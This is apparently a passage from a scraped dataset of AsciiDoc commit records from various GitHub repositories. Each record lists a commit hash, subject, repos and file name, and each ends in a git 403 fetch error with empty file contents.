access 'https:\/\/github.com\/couchbaselabs\/sync_gateway.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"aefb40944286640c4ec463583e94d8cc469ba053","subject":"another fix from Bilal","message":"another fix from Bilal\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_toc.asciidoc","new_file":"trex_toc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9752f8270205e4f80fdb2d1148e08f4534d2dde3","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae0a64026b3f477d23ca1b9deb275a79eb0e1df5","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b98b58beb26b504fa099a5bfe5becd15e639ac48","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eea9fe1cc49a31827fc0611f358aaf97ddc37e4b","subject":"Minor fixes","message":"Minor fixes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64b504c238b0259b799ac0470eba5c355c63a9b3","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/08\/27\/deref.adoc","new_file":"content\/news\/2021\/08\/27\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2db307ddfdae6ed32def075fd4b70507c8f46288","subject":"Worked on Programs Cache documentation.","message":"Worked on Programs Cache documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Programs Cache values.asciidoc","new_file":"documentation\/Programs Cache values.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c63616ad808ad025683657d7a7d8303526c3282","subject":"Update 2017-01-26-Updating-the-blog-version.adoc","message":"Update 2017-01-26-Updating-the-blog-version.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"527d152c43748ab33d4c0f32c2fdb7a7081f0332","subject":"Update 2016-06-28-Resume.adoc","message":"Update 2016-06-28-Resume.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Resume.adoc","new_file":"_posts\/2016-06-28-Resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2848e6c4420972f211a0bc326bbf179670d1f3","subject":"Update 2017-05-31-A-test.adoc","message":"Update 2017-05-31-A-test.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-A-test.adoc","new_file":"_posts\/2017-05-31-A-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7348febd7c1effc914f322dfab383838c33855c3","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98f08ab68eeec20f7dcfead813004e42bb945135","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 
2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"445798a02ccd9994abf76ee90123c2e7d3c913c5","subject":"Update 2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","message":"Update 2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","new_file":"_posts\/2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c98adfdcc26dfc8e83b7bf4b294242e5cb14d5ca","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4250b4bac832b25849dd746e37a4b45c307dbdbb","subject":"Update index.adoc","message":"Update index.adoc\n\nEnglish grammar.","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ad16ffd84046a200e0b7ef9a8ac0388e4d62f74","subject":"Docs: Correcting a typo in tophits (#32359)","message":"Docs: Correcting a typo in tophits 
(#32359)\n\n","repos":"nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b057b7445006439c116d8c70cb27a5b63957593f","subject":"Update 2016-09-21-CircleCI-mono-project.adoc","message":"Update 2016-09-21-CircleCI-mono-project.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-09-21-CircleCI-mono-project.adoc","new_file":"_posts\/2016-09-21-CircleCI-mono-project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246f5197bb819310d862e83150f44b64b819b579","subject":"update","message":"update\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0bef6b42fd2e443716dab72e2c34f23ef0ea01","subject":"Update 2016-07-24-Forensic-Sasser-worm.adoc","message":"Update 2016-07-24-Forensic-Sasser-worm.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f39056b0e4fc2142cb0f2b06a120dbd59097a16","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 
2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46838db140803e747d376c9ff523711b00491ccd","subject":"update product to community mapping","message":"update product to community mapping\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"community\/product.adoc","new_file":"community\/product.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e58dd1c8bd3c424e96e95aadccc3a00a50b80fd6","subject":"remove mac-spread","message":"remove mac-spread\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"396307b2baacfcba4df0d0e2998f78831663052d","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a8b68ab6421af1b0124519fce55c1b26c1704da","subject":"Init Project","message":"Init Project\n\nSigned-off-by: Mike Schilling <49f7fbe9e108b60288e59e5258af85ba6e5f3584@gmail.com>\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac3cf12930d76f7ae5d3cdbc71baa3758705bd02","subject":"Note to install \"which\" command in the installation guide in case of building on RHEL\/CentOS.","message":"Note to install \"which\" command in the installation guide in case of building on RHEL\/CentOS.\n\nI tried to build on Docker container with official CentOS7 image and \nwhen I tried to build 
thirdparty libraries, I caught an error message as follows.\n\n+ \/root\/work\/kudu\/thirdparty\/preflight.py\nRunning pre-flight checks\n-------------------------\nUsing C compiler: c++\nUsing C++ compiler: c++\n\n (Set $CC and $CXX to change compiler)\n-------------------------\nChecking for autoconf\nTraceback (most recent call last):\n File \"\/root\/work\/kudu\/thirdparty\/preflight.py\", line 149, in <module>\n sys.exit(main())\n File \"\/root\/work\/kudu\/thirdparty\/preflight.py\", line 141, in main\n check_tools()\n File \"\/root\/work\/kudu\/thirdparty\/preflight.py\", line 97, in check_tools\n if subprocess.call([\"which\", tool], stdout=DEV_NULL, stderr=DEV_NULL) != 0:\n File \"\/usr\/lib64\/python2.7\/subprocess.py\", line 524, in call\n return Popen(*popenargs, **kwargs).wait()\n File \"\/usr\/lib64\/python2.7\/subprocess.py\", line 711, in __init__\n errread, errwrite)\n File \"\/usr\/lib64\/python2.7\/subprocess.py\", line 1327, in _execute_child\n raise child_exception\nOSError: [Errno 2] No such file or directory\n\nThis message means that \"which\" command is absent.\nOf course, I understand it's very rare case that \"which\" is absent but I think \nit's better to note just in case to install \"which\" command in the installation guide.\n\nChange-Id: If02eae6f22a51965120a037cc9a68ddefa418b6c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5216\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f409afd6d86bd53bae38f5dede6c05ffbb44abc","subject":"Added InvisiMole IoCs","message":"Added InvisiMole IoCs\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"invisimole\/README.adoc","new_file":"invisimole\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"849fc5062175e7ed373476d9980b46b7b332b202","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38121c6bf8617f19c92643f2273d3a867672ce05","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1beda1d680f933fadb50f9212d828d79c1e19e8f","subject":"add ClojureBridge Seoul","message":"add ClojureBridge Seoul\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurebridge-seoul.adoc","new_file":"content\/events\/2017\/clojurebridge-seoul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b0458c6847e8fd4e5f8d77108ae54aa2001e8d5f","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c54954194512621ec3c4902c095e47419f1b20e","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b01c1b5ed0dadcdadff0f5e4c356473cd00dae","subject":"Update 2019-12-31-prayer.adoc","message":"Update 2019-12-31-prayer.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-31-prayer.adoc","new_file":"_posts\/2019-12-31-prayer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16bd6475f8686ee45e68c32a1c6a4095c3fc7892","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 
2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fa535278e80d9ec94d582db048efc08c325b354","subject":"doc: add man page for daniel-export","message":"doc: add man page for daniel-export\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/daniel-ruby,bk2204\/daniel-ruby","old_file":"doc\/daniel-export.adoc","new_file":"doc\/daniel-export.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/daniel-ruby.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a7eb5b5f626ffee34676b957b107e03cd821749","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5baabff6670a8ed49297488ca8cac8ec12a2078d","subject":"[DOCS] Update mapping API to require index name (#71489)","message":"[DOCS] Update mapping API to require index name (#71489)\n\n","repos":"GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/indices\/put-mapping.asciidoc","new_file":"docs\/reference\/indices\/put-mapping.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robin13\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e16595abe1a7faeb0edb371b926b8d281cd41096","subject":"Removed open issue from 2.1.1 release notes","message":"Removed open issue from 2.1.1 release notes\n","repos":"strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test","old_file":"docs\/reference\/release-notes\/2.1.1.asciidoc","new_file":"docs\/reference\/release-notes\/2.1.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca605fafc2c63695944267b25f4e2ca880b1c14a","subject":"notes on upgrading python packages","message":"notes on upgrading python 
packages\n","repos":"ccheetham\/home,ccheetham\/home,ccheetham\/home","old_file":"etc\/python\/README.adoc","new_file":"etc\/python\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ccheetham\/home.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3101117efb232d1a46aea350c86b299f9c86f5e8","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a44fba70941c72ab20624183e3092be4b9744ac8","subject":"added todo","message":"added todo\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines","old_file":"docs\/INTRO.adoc","new_file":"docs\/INTRO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"323bfbbdd6bb12610adeae71c0bfa645b74a09aa","subject":"Added wiretap EIP docs","message":"Added wiretap EIP 
